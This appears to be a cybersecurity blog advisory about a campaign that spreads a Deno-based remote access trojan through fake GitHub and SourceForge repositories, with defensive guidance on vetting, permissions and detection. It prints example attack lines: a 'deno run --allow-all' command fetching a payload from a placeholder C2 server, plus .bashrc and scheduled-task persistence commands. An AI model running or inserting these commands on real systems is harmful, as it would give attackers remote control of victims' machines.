Threat actors are distributing the Deno-based remote access trojan (RAT) through fake software repositories on GitHub and SourceForge. These malicious packages masquerade as legitimate development tools and productivity software, targeting developers and tech-savvy users. The Deno RAT provides attackers with comprehensive remote access capabilities, including keylogging, screen capture, file manipulation, and command execution. Organizations must implement strict software vetting procedures and monitor for indicators of compromise to protect against this supply chain threat.
Introduction
The open-source community has long been celebrated as a cornerstone of collaborative software development, but this trust-based ecosystem is increasingly exploited by sophisticated threat actors. A new campaign has emerged leveraging GitHub and SourceForge platforms to distribute malicious software packages containing Deno RAT, a powerful remote access trojan built on the Deno JavaScript/TypeScript runtime.
This distribution method represents a concerning evolution in malware delivery tactics. By hosting malicious payloads on trusted development platforms and disguising them as legitimate tools, attackers are successfully compromising developer workstations and potentially entire software supply chains. The use of Deno—a modern, secure runtime—demonstrates threat actors’ adaptability in leveraging newer technologies to evade traditional detection mechanisms.
Background & Context
GitHub and SourceForge have established themselves as essential platforms for software distribution and open-source collaboration, hosting millions of projects accessed by developers worldwide. This trust and ubiquity make them attractive vectors for malware distribution, as users often lower their defensive posture when downloading from these platforms.
Deno, created by Node.js founder Ryan Dahl, is a modern runtime for JavaScript and TypeScript that emphasizes security by default. Ironically, this same runtime has been weaponized to create RATs that benefit from Deno’s cross-platform capabilities and relatively lower detection rates compared to traditional malware frameworks.
Remote access trojans remain one of the most dangerous malware categories, providing attackers with persistent backdoor access to compromised systems. Unlike ransomware or cryptominers with obvious symptoms, RATs operate stealthily in the background, exfiltrating data and maintaining long-term persistence for reconnaissance and lateral movement operations.
Previous campaigns have used similar tactics, including the distribution of trojanized npm packages, malicious PyPI libraries, and compromised software installers. This Deno RAT campaign builds on these established techniques while exploiting the growing Deno ecosystem’s relative immaturity in security tooling and awareness.
Technical Breakdown
The Deno RAT distribution campaign employs social engineering combined with technical obfuscation to compromise targets. Threat actors create convincing repository profiles complete with documentation, readme files, and even fake star counts to establish legitimacy.
Distribution Mechanism
The malicious repositories typically impersonate popular development tools, utilities, or productivity applications. Common lures include:
- Code editors and IDE extensions
- System optimization tools
- File conversion utilities
- Development frameworks and libraries
Once a user downloads and executes the fake software, the installation package deploys the Deno RAT alongside or instead of any promised functionality. The malware may include actual benign software functionality to avoid immediate suspicion.
Deno RAT Capabilities
The Deno-based RAT leverages the runtime’s capabilities to implement comprehensive surveillance and control features:
Remote Command Execution: The RAT establishes a reverse shell connection, allowing attackers to execute arbitrary commands with the privileges of the infected user.
# Example command structure used by the RAT
deno run --allow-all --unstable https://[C2-server]/payload.tsKeylogging: Captures keystroke data including credentials, sensitive communications, and intellectual property typed by victims.
Screen Capture: Periodically captures screenshots or streams screen content to operators for reconnaissance.
File Operations: Provides full file system access for exfiltration, modification, and deployment of additional payloads.
Persistence Mechanisms: The RAT establishes persistence through various methods:
# Common persistence technique on Linux/macOS
echo 'deno run --allow-all ~/.config/deno/startup.ts' >> ~/.bashrc
# Windows scheduled task creation
schtasks /create /tn "DenoUpdate" /tr "deno run --allow-all C:\Users\[user]\AppData\deno_update.ts" /sc onlogon
Communication: The malware communicates with command-and-control (C2) infrastructure over HTTPS, blending with legitimate traffic and potentially implementing domain generation algorithms (DGA) for resilience.
Obfuscation Techniques
The malware authors employ several obfuscation methods to evade detection:
- Code minification and variable name randomization
- Multi-stage payload delivery
- String encoding and runtime decryption
- Abuse of Deno’s permission system to request broad access
- Use of compromised or bulletproof hosting for C2 servers
Impact & Risk Assessment
The distribution of Deno RAT through trusted development platforms poses significant risks across multiple dimensions:
Individual Developer Impact: Compromised workstations provide attackers with access to source code repositories, credentials stored in development environments, API keys, and intellectual property. Developers often possess elevated privileges and access to critical infrastructure, amplifying the potential damage.
Supply Chain Risk: When developer systems are compromised, threat actors can inject malicious code into legitimate software projects, potentially affecting downstream users and customers. This represents a supply chain attack vector similar to high-profile incidents like SolarWinds and Codecov.
Enterprise Exposure: Organizations whose developers install compromised software face data breaches, intellectual property theft, and potential regulatory compliance violations. The lateral movement capabilities of RATs enable attackers to pivot from initial footholds to critical business systems.
Platform Trust Erosion: Continued abuse of GitHub and SourceForge for malware distribution damages trust in open-source ecosystems, potentially hindering legitimate collaboration and innovation.
The severity is particularly high for organizations in technology, finance, healthcare, and government sectors where developers handle sensitive information and have access to production environments.
Vendor Response
GitHub and SourceForge have implemented various security measures to combat malicious repository distribution, though gaps remain in enforcement and detection.
GitHub’s security team actively monitors for malicious repositories using automated scanning and community reporting mechanisms. Identified malicious accounts are suspended, and repositories are removed. However, the sheer volume of daily repository creation makes comprehensive real-time monitoring challenging.
SourceForge has similarly increased scrutiny of uploaded projects, implementing malware scanning and manual review processes for suspicious submissions. Both platforms have established abuse reporting channels and publish transparency reports on security actions taken.
The Deno project maintainers have acknowledged the issue and emphasized that Deno’s permission model—when properly implemented—requires explicit user consent for dangerous operations. However, users frequently grant broad permissions without full understanding of the security implications.
Security vendors have begun updating their detection signatures to identify Deno RAT variants, with varying success rates depending on the specific obfuscation techniques employed by threat actors.
Mitigations & Workarounds
Organizations and individual developers should implement multiple defensive layers to protect against this threat:
Software Vetting Procedures
Establish strict policies for downloading and executing software:
- Verify repository authenticity through multiple indicators (age, contributor history, community engagement)
- Check for verified badges and official organization accounts
- Review commit history for suspicious activity
- Examine download statistics and community feedback
- Cross-reference official project websites before downloading
Permission Management
When using Deno applications, carefully review permission requests:
# Avoid running with --allow-all flag
# Instead, grant specific permissions
deno run --allow-net=specific-domain.com --allow-read=/specific/path script.tsSystem Hardening
Implement principle of least privilege:
- Use standard user accounts for development work
- Implement application whitelisting where feasible
- Enable endpoint detection and response (EDR) solutions
- Maintain up-to-date antivirus and anti-malware software
Network Segmentation
Isolate development environments from production systems and implement strict egress filtering to block unauthorized C2 communications.
Detection & Monitoring
Effective detection requires monitoring multiple indicators across endpoints and networks:
Endpoint Indicators
Monitor for suspicious Deno process execution:
# Search for Deno processes with suspicious flags
ps aux | grep -i "deno.*--allow-all"
# Check for unusual Deno installations
find / -name "deno" -type f 2>/dev/null
Examine persistence mechanisms:
- Startup scripts and shell configuration files
- Scheduled tasks and cron jobs
- Registry run keys (Windows)
- Launch agents and daemons (macOS)
Network Indicators
Monitor for:
- Unexpected HTTPS connections to unusual domains
- High-frequency beaconing patterns consistent with C2 communication
- Data exfiltration to cloud storage services
- Connections to known malicious IP ranges
# Monitor network connections from Deno processes
netstat -anp | grep denoFile System Monitoring
Watch for:
- Unexpected TypeScript/JavaScript files in system directories
- Modifications to shell configuration files
- Creation of hidden directories in user profiles
Implement file integrity monitoring (FIM) for critical directories and leverage security information and event management (SIEM) solutions to correlate indicators across the environment.
Best Practices
Protecting against fake software distribution requires comprehensive security hygiene:
Software Supply Chain Security:
- Maintain an approved software inventory
- Use package managers with integrity verification
- Implement software composition analysis (SCA) tools
- Conduct security reviews before adopting new tools
Security Awareness Training:
- Educate developers about social engineering tactics
- Promote skepticism when downloading software, even from trusted platforms
- Establish clear reporting procedures for suspicious software
Incident Response Preparedness:
- Maintain current incident response playbooks
- Conduct regular tabletop exercises
- Establish procedures for compromised developer credential rotation
- Implement code review processes to detect injected malicious code
Runtime Security:
- Deploy EDR solutions on all developer workstations
- Implement application behavior monitoring
- Use sandboxing for testing untrusted software
- Enable comprehensive logging for forensic capability
Verification Procedures:
Always verify software authenticity through official channels before downloading. Check digital signatures, compare checksums, and consult official documentation for recommended download sources.
Key Takeaways
- Threat actors are actively exploiting trust in GitHub and SourceForge to distribute Deno RAT through fake software repositories
- The Deno-based RAT provides comprehensive remote access capabilities including keylogging, screen capture, and command execution
- Developer workstation compromise presents significant supply chain risks beyond individual impact
- Multi-layered defenses including software vetting, permission management, and monitoring are essential
- Organizations must implement strict software procurement policies and security awareness programs
- Deno’s permission model provides security benefits only when users avoid blanket permission grants
- Continuous monitoring for behavioral indicators and network anomalies enables timely detection
- The campaign demonstrates evolving threat actor sophistication in leveraging modern development technologies
References
- GitHub Security Advisory Database – https://github.com/advisories
- SourceForge Security and Abuse Policy – https://sourceforge.net/p/forge/documentation/Security%20and%20Abuse/
- Deno Security Best Practices – https://deno.land/manual/getting_started/permissions
- MITRE ATT&CK Framework – T1195 (Supply Chain Compromise) – https://attack.mitre.org/techniques/T1195/
- NIST Software Supply Chain Security Guidance – https://csrc.nist.gov/publications
Stay updated at https://cydhaal.com — Your Daily Dose of Cyber Intelligence.
📧 Subscribe to our newsletter at https://cydhaal.com/newsletter/
